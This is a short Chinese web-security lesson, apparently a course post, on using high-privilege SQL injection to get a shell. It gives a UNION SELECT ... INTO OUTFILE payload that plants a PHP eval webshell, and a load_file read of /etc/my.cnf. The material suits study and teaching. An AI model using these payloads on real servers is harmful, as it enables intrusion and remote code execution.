风炫安全Web安全学习第十六节课 高权限sql注入getshell

风炫安全Web安全学习第十六节课 高权限sql注入getshell

sql高权限getshell

前提条件:

  1. 需要知道目标网站绝对路径

  2. 目录具有写的权限

  3. 需要当前数据库用户开启了secure_file_priv

select database() into outfile '/var/www/html/1.txt'

allen' union select 1,'<?php eval($_GET[w]); ?>' into outfile '/var/www/html/2.php' #

site: xxx.com error

写文件

into outfile 将select的结果写入到指定目录的1.txt中

在一些没有回显的注入中可以使用into outfile的结果写入文件中,然后获得权限

读文件

Load_file 函数可以读文件

select load_file('/etc/my.cnf');
参考:
(https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/)[https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/]

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容